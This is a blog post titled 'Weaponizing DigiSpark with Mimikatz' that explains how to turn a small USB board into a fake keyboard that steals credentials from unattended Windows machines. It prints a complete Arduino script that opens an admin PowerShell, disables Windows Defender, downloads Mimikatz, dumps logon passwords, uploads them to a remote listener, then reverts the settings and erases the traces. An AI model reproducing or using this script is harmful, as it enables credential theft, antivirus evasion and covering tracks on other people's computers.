...at least you're not on hold...

February 7, 2020

Weaponizing DigiSpark with Mimikatz

Weaponizing DigiSpark with Mimikatz

What’s DigiSpark ?

DigiSpark is one of the smallest Arduino development boards based on an Attiny85 microcontroller. It’s built to work on USB’s 5V, consists of ~6k flash memory and 6 I/O Pins. The actual charm about it is that it’s cheap and affordable, yet powerful enough to run weaponized scripts.

The great plan

Programming the DigiSpark to do a fast and stealth as possible credential theft from the Windows system. It’s been imagined as a fast way to access credentials from an unattended system by representing itself as a HID (Human Interface Device / Keyboard).

The process is following:

  1. Run a PowerShell session as Admin
  2. Disable protection for script execution policy
  3. Disable active scanning for Windows Defender
  4. Download and execute MimiKatz to pull creds
  5. Convert the output to a string
  6. Upload the string into PHP listener
  7. Revert AV and policy changes
  8. Clear leftover logs and files
  9. Blink the LED for being done

Setting up software

Since DigiSpark is a microcontroller, it requires and IDE with proper drivers to be programmed.

In this scenario we will be using Ardunio IDE which is available to download at the following link.

After setting it up, extra drivers are required for support on Digispark

  • Head to File – Preferences
  • In the box named “Additional Boards Manager URL” add the following
http://digistump.com/package_digistump_index.json
  • Click OK
  • Head to Tools menu
  • Click Boards Manager which is located in Board submenu
  • Search for DigiStump and install the drivers

Now you’re all set!

Connect the DigiSpark, and start uploading Your code from the Arduino IDE.


Script

#include "DigiKeyboard.h"
void setup() {
  pinMode(1, OUTPUT); // on-board led for model A
}

void loop() {
  DigiKeyboard.delay(6000); // wait 6 sec before start
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_X, MOD_GUI_LEFT); // Win + X
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_A); // Run PowerShell as admin
  DigiKeyboard.delay(2000); // Delay for laggy PC-s
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT); // select yes on UAC prompt
  DigiKeyboard.sendKeyStroke(KEY_ENTER); // confirm the prompt
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-ExecutionPolicy Unrestricted"); // Enable running scripts policy
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $true"); // Disable Windows defender
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("cd $ENV:temp"); // Navigate into temp dir
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Invoke-WebRequest -Uri 'Can'tHostAnymore' -OutFile 'mimi.exe'");
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("./mimi.exe 'sekurlsa::logonpasswords full' >> dump.file"); // Call mimikatz to dump system credentials
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("$output = Get-Content dump.file"); //Convert output to string, preupload
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("(New-Object Net.WebClient).UploadString('PHPI'mNotHosting', $output)"); //Upload to listener
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Remove-Item mimi.exe"); // Remove mimikatz
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-ExecutionPolicy Restricted"); // Revert policy
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $false"); // Enable Windows defender
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"); //Remove RUN prompt history
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("exit"); // Exit PowerShell
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  digitalWrite(1, HIGH); // LED indicator, ready to remove
  DigiKeyboard.delay(10000);
}

I think the code is pretty straightforward and comments are simple, listener script is available at the repository. (Update: Repo has been removed, message me for code)

This is still in early alpha, so expect a lot of changes to be made.

Bash script for automating install of the server side is still in progress. 
Thanks for reading!

Posted in Linux